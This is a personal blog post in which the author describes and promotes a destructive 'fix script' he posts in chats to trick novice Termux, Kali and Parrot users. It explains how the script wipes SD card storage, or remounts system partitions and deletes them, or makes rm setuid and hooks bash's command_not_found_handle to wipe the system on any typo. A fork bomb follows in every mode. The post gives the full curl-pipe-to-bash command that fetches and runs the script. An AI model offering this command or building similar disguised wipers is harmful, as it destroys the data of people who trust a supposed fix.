Why the fix script?

Last updated: 2020-04-30

What is the fix script?

The fix script is a script I wrote long ago to.. well not to fix systems, though that kind of depends on your point of view. It is mainly targeted at Termux/Kali/Parrot users and in a nutshell, it hoses their system. Technically if they go to a regular distribution at that point, it does fix the crux of the problem. And that problem is script kiddies, aka skids. There is no reason whatsoever to be running a pentesting distribution if you don't know how Linux works and are too naive to think twice before running the script of a random guy on the intertubes. And it is usually posted in response to some kind of very stupid question, when it is already very clear that the person in question is a skid. Maybe it could be considered like GIF, a kind of inside joke / slang among many of the hackers on Telegram, in practice having a similar shock factor.

The fix script has 3 modes of operation - unrooted Termux, rooted Termux, and desktop Linux (limited to Parrot and Kali, bailing out otherwise). So essentially all the skid systems out there.
In unrooted Termux mode it asks for storage permission to gain access to the files on the SD card partition. Then it removes everything there. It's about all the havoc the fix script can wreak in this mode, but still sufficient to do the job.
In rooted Termux mode it uses this access to remount / and /system read-write (to deal with both the older as well as the new SAR-enabled systems) and hoses the whole system. The result is that reflashing the system from the recovery is necessary.
In desktop Linux mode things are a little more subtle. It asks for sudo permission to mark the rm binary as suid (chmod +s). What this does is enabling the rm binary to be run with root privileges while *not* requiring any authorization. This is important for the next thing it does, modifying the command_not_found_handle in bash (this is intentional as this script does not seek to target people running other "aftermarket" shells). Whenever a wrong command is entered, this function gets executed by the shell. It's basically how Suicide Linux works too. When a wrong command is entered, a message "lmao retard" will be shown and the system will be hosed. Now if sudo were to be used here, obviously anyone would bail out straight away. But that's the thing - at that point rm doesn't require that anymore. So it hoses the system without needing any interaction. I think that's pretty neat.
Additionally, in all these modes a fork bomb is executed afterwards. So if you hear stories of the phone becoming unresponsive, you can be pretty confident that all their data is successfully hosed too.

The command to run the fix script would be this:
curl -sL ghnou.su/fix.sh | bash -
Note that the -L parameter is only there to make curl follow redirects (such as HTTPS upgrades which are a 301 type redirect). If https:// is prepended to the URL, this option is not needed. Personally I just prefer not prepending it when curl can do the same given some assistance (though honestly it should treat HTTPS upgrades differently from other redirects, but I digress).

Why does it exist?

At this point a question should be asked - is this evil? And of course the answer is yes. Is it borderline malware? Arguably. Does it fulfill a function? Honestly I would say so. It makes these skids less gullible and hopefully enables them to reconsider whether they should really hack that Facebook account. And it could be said that it's a next-generation version of the rm -rf /* command that's floated around on the interwebs for decades. This is nothing new, but of course at this point improved and more targeted at the kind of systems that matter most. Finally you could argue that the people running it were themselves already up to no good - looking to "hack a victim". Except they became the victim themselves. Par for the course imo. But that depends on your moral compass and perhaps your sense of inclusivity.

Another thing that could be noted is that.. actually developers in particular seem to like it a lot, many sharing the same frustrations with skids that I do. The fix script now leads a life of its own in a way, being included in other repositories, a note in the official offtopic chat for ParrotOS by one of the project developers, and so on. At the time of writing one of my friends who's an Android developer is contemplating whether to write a native Android app (now hosted here, source here and here) for it, pretty cool! And now even a Windows version of the fix script exists here with source here. I like how the fix script is growing into so much more than I could possibly do alone. If you're one of the aforementioned people, thank you! :D